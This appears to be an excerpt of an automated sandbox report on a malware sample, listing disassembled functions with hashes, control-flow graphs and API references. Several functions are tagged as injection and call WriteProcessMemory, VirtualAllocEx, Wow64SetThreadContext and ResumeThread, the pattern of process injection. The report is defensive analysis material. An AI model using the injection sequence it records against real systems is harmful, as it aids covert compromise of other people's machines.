                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$h#
                                                          • API String ID: 0-958925979
                                                          • Opcode ID: cbc1f088290eda117a6eabc5a6d209198a0b2cc0856c264c1c8e21fbeb5abd63
                                                          • Instruction ID: 08301760f01dcf2839ecb7b8541c5eed261821837e66e8722a86937d776ac62d
                                                          • Opcode Fuzzy Hash: cbc1f088290eda117a6eabc5a6d209198a0b2cc0856c264c1c8e21fbeb5abd63
                                                          • Instruction Fuzzy Hash: D6819130B00214EFDB189B68D819BBEBBB2EF84305F658066E406EB395CF758C41DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D88D2 Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1119 1d88d2-1d88d7 1120 1d88e9-1d88ed 1119->1120 1121 1d88d9 1119->1121 1122 1d88ef-1d88f8 1120->1122 1123 1d8910 1120->1123 1121->1120 1124 1d8bed-1d8bf4 1121->1124 1125 1d8a9f-1d8ac9 1121->1125 1126 1d8af5-1d8b93 1121->1126 1127 1d8ad4-1d8ade 1121->1127 1128 1d89e7-1d8a69 1121->1128 1129 1d8ba6-1d8bcf call 2e4640 1121->1129 1130 1d88ff-1d890c 1122->1130 1131 1d88fa-1d88fd 1122->1131 1134 1d8913-1d891d 1123->1134 1243 1d8acb call 2e3858 1125->1243 1244 1d8acb call 2e3940 1125->1244 1245 1d8acb call 2e3950 1125->1245 1133 1d8bf7-1d8cc7 1126->1133 1212 1d8b95-1d8ba1 1126->1212 1132 1d8ae4-1d8af0 1127->1132 1127->1133 1194 1d8a6b-1d8a71 1128->1194 1195 1d8a81-1d8a8b 1128->1195 1182 1d8bd6-1d8bdd 1129->1182 1136 1d890e 1130->1136 1131->1136 1153 1d8ccc-1d8ccf 1133->1153 1142 1d8928-1d892f 1134->1142 1136->1134 1148 1d8931-1d893a 1142->1148 1149 1d8952 1142->1149 1150 1d893c-1d893f 1148->1150 1151 1d8941-1d894e 1148->1151 1152 1d8955-1d89c2 1149->1152 1156 1d8950 1150->1156 1151->1156 1202 1d89da-1d89e2 1152->1202 1203 1d89c4-1d89ca 1152->1203 1154 1d8cd8-1d8cdd 1153->1154 1155 1d8cd1 1153->1155 1154->1153 1155->1154 1161 1d8cfc-1d8d01 1155->1161 1162 1d8cdf-1d8cec 1155->1162 1163 1d8d39-1d8d40 1155->1163 1164 1d8d0a-1d8d15 1155->1164 1165 1d8d25-1d8d2c 1155->1165 1166 1d8d03 1155->1166 1156->1152 1161->1153 1171 1d8cee 1162->1171 1172 1d8cf5-1d8cfa 1162->1172 1175 1d8d17-1d8d23 1164->1175 1176 1d8d43-1d8dec 1164->1176 1165->1176 1177 1d8d2e-1d8d37 1165->1177 1166->1164 1178 1d8cf3 1171->1178 1172->1161 1172->1178 1173 1d8ad1 1173->1127 1175->1153 1210 1d8e9a-1d8ecd 1176->1210 1211 1d8df2-1d8dff 1176->1211 1177->1153 1178->1153 1182->1133 1184 1d8bdf-1d8be8 1182->1184 1198 1d8a75-1d8a77 1194->1198 1199 1d8a73 1194->1199 1195->1133 1200 1d8a91-1d8a9a 1195->1200 1198->1195 1199->1195 1206 1d89cc 1203->1206 1207 1d89ce-1d89d0 1203->1207 1206->1202 1207->1202 1216 1d8f03-1d8f51 1210->1216 1211->1210 1213 1d8e05-1d8e12 1211->1213 1213->1210 1215 1d8e18-1d8e25 1213->1215 1215->1210 1217 1d8e27-1d8e34 1215->1217 1228 1d8f88-1d8f8e 1216->1228 1229 1d8f53-1d8f5f 1216->1229 1217->1210 1218 1d8e36-1d8e43 1217->1218 1218->1210 1220 1d8e45-1d8e52 1218->1220 1220->1210 1221 1d8e54-1d8e61 1220->1221 1221->1210 1222 1d8e63-1d8e99 call 1d7f58 1221->1222 1231 1d8ecf-1d8ed2 1229->1231 1234 1d8edb-1d8eef 1231->1234 1235 1d8ed4 1231->1235 1234->1228 1240 1d8ef5-1d8f01 1234->1240 1235->1216 1235->1234 1237 1d8f64-1d8f70 1235->1237 1238 1d8f73-1d8f87 1235->1238 1237->1238 1240->1231 1243->1173 1244->1173 1245->1173
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$h#
                                                          • API String ID: 0-958925979
                                                          • Opcode ID: 137fc3e5020a81a9dd73c4a20f43f8e88d60a836491dfd143bab6576bf339bb5
                                                          • Instruction ID: 343c56ccd0c7bae17dd3bfb933a66b77cd0104e7007d69f0a1e385d91ba5d95e
                                                          • Opcode Fuzzy Hash: 137fc3e5020a81a9dd73c4a20f43f8e88d60a836491dfd143bab6576bf339bb5
                                                          • Instruction Fuzzy Hash: 9D719230B002149FDB189B68D829BBEBAE2EFC4705F258166E905EB395CF75CC41CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EC998 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1334 2ec998-2ec999 1335 2ec99b-2ec9c2 1334->1335 1336 2ec9c8-2eca0b 1334->1336 1335->1336 1338 2eca0d-2eca1f 1336->1338 1339 2eca22-2eca89 WriteProcessMemory 1336->1339 1338->1339 1341 2eca8b-2eca91 1339->1341 1342 2eca92-2ecae4 1339->1342 1341->1342
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002ECA73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID: W KF
                                                          • API String ID: 3559483778-3286359180
                                                          • Opcode ID: b8b6eef3ad4994e2bbac9e4775744ee18a2deab4e4c04b14f8385ef0db190b24
                                                          • Instruction ID: 17e837a2bebde2fb0f0c8212cdb6b84c7859bc33447bce24e809cf51f05db402
                                                          • Opcode Fuzzy Hash: b8b6eef3ad4994e2bbac9e4775744ee18a2deab4e4c04b14f8385ef0db190b24
                                                          • Instruction Fuzzy Hash: D841BBB5D002599FCF10CFA9D984AEEFBF1BB49314F24902AE814B7210D378AA55CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EC9A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002ECA73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID: W KF
                                                          • API String ID: 3559483778-3286359180
                                                          • Opcode ID: f6efa41184304fcff0fbf2f376f1ea0a205a1b2d7d6f613e1ae856783428aacf
                                                          • Instruction ID: 2a67c29cf057a7ecde762c91fb54e8224f84ecc817e35991572d230aaf45ec59
                                                          • Opcode Fuzzy Hash: f6efa41184304fcff0fbf2f376f1ea0a205a1b2d7d6f613e1ae856783428aacf
                                                          • Instruction Fuzzy Hash: 9641ABB4D002599FCF00CFA9D984AEEFBF1BB49314F20942AE818B7210D774AA55CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002ECAFA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002ECBB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID: W KF
                                                          • API String ID: 1726664587-3286359180
                                                          • Opcode ID: 46de93dc4c311fa6b75a25bcec1204194ddc3a2cf98ee8bf7ef955dc92364ec7
                                                          • Instruction ID: 39fcb1c176ecfb1cc74ff246c24d7dc2494f88cb04c46f77d66bff8afab11f9a
                                                          • Opcode Fuzzy Hash: 46de93dc4c311fa6b75a25bcec1204194ddc3a2cf98ee8bf7ef955dc92364ec7
                                                          • Instruction Fuzzy Hash: 7041BAB5D002589FCF10CFAAD984AEEFBB1BF49314F20942AE815B7210C375A956CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002ECB00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002ECBB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID: W KF
                                                          • API String ID: 1726664587-3286359180
                                                          • Opcode ID: 4c0f5843d73d4a4b40e8d3527cd9f4e32d267382fc649b0cb4f54325b87efe15
                                                          • Instruction ID: 80a52a3d3421a651c24f6c10380f96967182f06558cdf23e3d49fd487037665d
                                                          • Opcode Fuzzy Hash: 4c0f5843d73d4a4b40e8d3527cd9f4e32d267382fc649b0cb4f54325b87efe15
                                                          • Instruction Fuzzy Hash: A841ABB5D002589FCF10CFAAD984AEEFBB1BF49314F20942AE814B7210D775A955CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EC872 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002EC922
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: W KF
                                                          • API String ID: 4275171209-3286359180
                                                          • Opcode ID: 85d10e2627c6a1a0e009cfe7fabd72f71e5248447f0c04606105c6e90e48c0c1
                                                          • Instruction ID: 8e913289fc7540e0e94402c890f81a8345e46c18d548328b0abff5e05de02f5a
                                                          • Opcode Fuzzy Hash: 85d10e2627c6a1a0e009cfe7fabd72f71e5248447f0c04606105c6e90e48c0c1
                                                          • Instruction Fuzzy Hash: 4D41AAB9D002489FCF10CFA9D984AEEFBB1AB49314F20942AE815B7214D375A916CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EC878 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002EC922
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: W KF
                                                          • API String ID: 4275171209-3286359180
                                                          • Opcode ID: 90a1362077e4c27d74f4a2c7d3ca56aaad39b5d52dc4e2fcc647784c2174d20e
                                                          • Instruction ID: d79c48aeb788bb571f297390363624682aff0be441b353374ba798f21517902c
                                                          • Opcode Fuzzy Hash: 90a1362077e4c27d74f4a2c7d3ca56aaad39b5d52dc4e2fcc647784c2174d20e
                                                          • Instruction Fuzzy Hash: 2D41A9B8D002489FCF10CFA9D984AEEFBB1BB49310F20942AE814B7310D735A916CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EC748 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 002EC7F7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID: W KF
                                                          • API String ID: 983334009-3286359180
                                                          • Opcode ID: aad83e5731ebd24130a2e1c6f71ed6d8d3b89947c18327616de17316dbbe2b40
                                                          • Instruction ID: 436c5560f9ec209db3c3eda5f98a8a50e96513e97e8ddf76f1c1b5d12cbae4e9
                                                          • Opcode Fuzzy Hash: aad83e5731ebd24130a2e1c6f71ed6d8d3b89947c18327616de17316dbbe2b40
                                                          • Instruction Fuzzy Hash: 3841ACB4D102599FCF10CFAAD984AEEFBB1AB49314F24802AE414B7240D778A945CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EC658 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ResumeThread.KERNELBASE(?), ref: 002EC6D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID: W KF
                                                          • API String ID: 947044025-3286359180
                                                          • Opcode ID: b3c619dfc10cea67ec6f8f1c03a7b55fe6624281c8a7b612ab8787b8cf4c2557
                                                          • Instruction ID: 1335616c0d125817525e55af9d41fc2e037ab500e7d4696e896cfe1082b9731f
                                                          • Opcode Fuzzy Hash: b3c619dfc10cea67ec6f8f1c03a7b55fe6624281c8a7b612ab8787b8cf4c2557
                                                          • Instruction Fuzzy Hash: B431DCB4D002489FCF10CFAAD884AAEFBB5AF49314F20942AE814B7300C735A905CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D9630 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp$$p
                                                          • API String ID: 0-4090011509
                                                          • Opcode ID: ebd0709cc13aa0ad1d7534e1b4954804d74e99fb21c6361317f1d610d91d11bd
                                                          • Instruction ID: 38660f87d215103e4f0ea4fa6d3637c9f21b03064285cb437a05cade821282ae
                                                          • Opcode Fuzzy Hash: ebd0709cc13aa0ad1d7534e1b4954804d74e99fb21c6361317f1d610d91d11bd
                                                          • Instruction Fuzzy Hash: 8951E171A193948FC7458F68D840A6ABBB2BF52700F1945ABE455CB3A2C374DC05DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D3E04 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L0#
                                                          • API String ID: 0-4225821239
                                                          • Opcode ID: aabe4d6649cd96828c27cb2acb011c5cc1a1edc20b8371193dc815fb0ba8c15d
                                                          • Instruction ID: 28333eabbafba3494effdc24f6f163d45dd0b20935e9511f26099c7c71f89616
                                                          • Opcode Fuzzy Hash: aabe4d6649cd96828c27cb2acb011c5cc1a1edc20b8371193dc815fb0ba8c15d
                                                          • Instruction Fuzzy Hash: A951EDE699DB944FC71A8F386864A5C3F909B72604F894EDFC0C1CA1C3EA209549C753
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0071020B Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.367583407.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_710000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: 4845904cbb85d3ec0c5205ad2e45bf3b8afb10ba03b51a70c0dd3dcb1ecf8a1d
                                                          • Instruction ID: cb6d78a29574611c4a791365a3b27e02c1ddd528702c16115ad8a78361df31d8
                                                          • Opcode Fuzzy Hash: 4845904cbb85d3ec0c5205ad2e45bf3b8afb10ba03b51a70c0dd3dcb1ecf8a1d
                                                          • Instruction Fuzzy Hash: 77410534949228CFDB60CF58DC48BEDB7B5BB4A301F2090D9D409A6296C7795AC5DF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DD4C8 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H+R
                                                          • API String ID: 0-1892171737
                                                          • Opcode ID: 22948636cd08f421a6a498d02b0d95598246f53a4bcf481377f316d7087af69e
                                                          • Instruction ID: 944e4872195d1c932360114c46e99d85f25e19767ede0c58ca2f43ad2eef5fae
                                                          • Opcode Fuzzy Hash: 22948636cd08f421a6a498d02b0d95598246f53a4bcf481377f316d7087af69e
                                                          • Instruction Fuzzy Hash: A631E7B4E052199FCB44CFA9D5809AEBBF2FB89300F1195AAD415E7325D3389A41CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DD4D8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H+R
                                                          • API String ID: 0-1892171737
                                                          • Opcode ID: 34cd61d2782b1da4c879a04d10ac9ef60b31c103c68b9bf02b09ea427208c1a9
                                                          • Instruction ID: 5907bca132453c17f164c4dc3f5d423850a196df42707a1776624b45ab18beaf
                                                          • Opcode Fuzzy Hash: 34cd61d2782b1da4c879a04d10ac9ef60b31c103c68b9bf02b09ea427208c1a9
                                                          • Instruction Fuzzy Hash: 7631C6B4E05219DFCB44CFA9D580AAEBBF2FB88304F20956AD419A7314D734AA41CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DD600 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ;Y
                                                          • API String ID: 0-1814415729
                                                          • Opcode ID: 9194fb5e004c8c2d8ccb7baa01e614915b80b75575a21c79826d2a7f2fac8fd0
                                                          • Instruction ID: 231a5c6ac680a3cdf09c998b68198849ffe07f22e4a4adb4649d2b6f93f469fe
                                                          • Opcode Fuzzy Hash: 9194fb5e004c8c2d8ccb7baa01e614915b80b75575a21c79826d2a7f2fac8fd0
                                                          • Instruction Fuzzy Hash: 8621F9B4E05219DFCB44CFA9D5409AEFBF2EF89300F258596C418E7315E730DA418B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DAFF9 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pg#
                                                          • API String ID: 0-455506864
                                                          • Opcode ID: 33fe0c23eec765b465d89d0c939160d055ed0ad8f52ffbb75e421506891648f7
                                                          • Instruction ID: 4b6d3a537e258cf8991f21fa8606958bb1e5f4a7fbf40cc59cb12b8875162e20
                                                          • Opcode Fuzzy Hash: 33fe0c23eec765b465d89d0c939160d055ed0ad8f52ffbb75e421506891648f7
                                                          • Instruction Fuzzy Hash: 452172B1908125CBCB18CF78C8802BEB7A1AF80351F6A85A3E866CB395D775C951D792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D80C1 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: he#
                                                          • API String ID: 0-57191706
                                                          • Opcode ID: bf9c26eeafab4afd2b6594b733d06c0f4c8ef4cb11ab170a6b8c6996037b2507
                                                          • Instruction ID: 004109b390b9a8f01bb393bddfe37d43796ea78cbeda95c4ba445877997c2541
                                                          • Opcode Fuzzy Hash: bf9c26eeafab4afd2b6594b733d06c0f4c8ef4cb11ab170a6b8c6996037b2507
                                                          • Instruction Fuzzy Hash: D2012D32200654ABC708EB6DE8156DEFBA6DFD8310F508837F519D3351DF34581883A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D7EB0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: XW#
                                                          • API String ID: 0-3396541691
                                                          • Opcode ID: f36f0d4446657a9c5db915d3e7e9e3de3a35dc560446a780b9be5bf2487654eb
                                                          • Instruction ID: 2bf838c62cc15e5ad9cef488e4cd1171aec312076fc704927f2a05fe9c2701ea
                                                          • Opcode Fuzzy Hash: f36f0d4446657a9c5db915d3e7e9e3de3a35dc560446a780b9be5bf2487654eb
                                                          • Instruction Fuzzy Hash: A501D771D1020DEFCB45EFA8D95169EBBF2FB48300F1089A5C015A7354EA349A159B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00710297 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.367583407.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_710000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: 177a5384120fdb7c6e32237961317cabfc26969fd0d583b58b8e19b039ada133
                                                          • Instruction ID: d8b4857093fbbb10572d078e21e507af1ff5b99b7182c8e04576a236756298d7
                                                          • Opcode Fuzzy Hash: 177a5384120fdb7c6e32237961317cabfc26969fd0d583b58b8e19b039ada133
                                                          • Instruction Fuzzy Hash: 6201F63590A258CFDB21CB68C844BE8BBB8FB0E304F1491CAD45DA3292C7749AD5DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D80D0 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: he#
                                                          • API String ID: 0-57191706
                                                          • Opcode ID: 4b3fb4b22e85bc4b6ccd5eda18c5954ca4ff8d6826213a18b85a98a354b8ce8a
                                                          • Instruction ID: a62543bef4b9ae1e455e12f23aa59a1c2b31cb08cbadd9563199372d14564e5b
                                                          • Opcode Fuzzy Hash: 4b3fb4b22e85bc4b6ccd5eda18c5954ca4ff8d6826213a18b85a98a354b8ce8a
                                                          • Instruction Fuzzy Hash: 71E0DF32300A6467C708FB2AE80588EF7ABDFD4320B80C43BF81D83360DF30590686A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D4557 Relevance: .2, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b457172a0c9ca2aaa3ce0ab1f215f6220e2c9b4c385db6f921a2a06d3aefafe
                                                          • Instruction ID: 567fdd460853084315b63410e7928e27375d2990abff2bf59b933ce3f23fd517
                                                          • Opcode Fuzzy Hash: 2b457172a0c9ca2aaa3ce0ab1f215f6220e2c9b4c385db6f921a2a06d3aefafe
                                                          • Instruction Fuzzy Hash: D3712DA5958BA44FC71A9F38A864A6C3F919F71604F894EDEC0C18F293DB209949CB53
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D5200 Relevance: .2, Instructions: 176COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea8847938dcf5cb819ac3385ca58f370b697f52e3ca1ce58c1a7291f7044563f
                                                          • Instruction ID: f440ae3f3e7223cc883116bbee2d1dbf896b9acd22dc3a0c96f16d8d1d0d669e
                                                          • Opcode Fuzzy Hash: ea8847938dcf5cb819ac3385ca58f370b697f52e3ca1ce58c1a7291f7044563f
                                                          • Instruction Fuzzy Hash: CE612CB9958B908FD3068F38AC68F1C7FA19B61608F594A9EC4C18B1D3DE21D949CB53
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DB0A8 Relevance: .1, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fd4fa46bab88e480236a111457fee110aeb3122ab84b8bb6f67473eec405ccb
                                                          • Instruction ID: a143c7799dba11c019a96064ece9f0df384d9e3dca6274e4fc40188ecd4afe25
                                                          • Opcode Fuzzy Hash: 0fd4fa46bab88e480236a111457fee110aeb3122ab84b8bb6f67473eec405ccb
                                                          • Instruction Fuzzy Hash: 46419F7190D684CFCB058F6CD8A569EBBB0EF56300F5641ABD162DB392D3389905CB62
                                                          Uniqueness

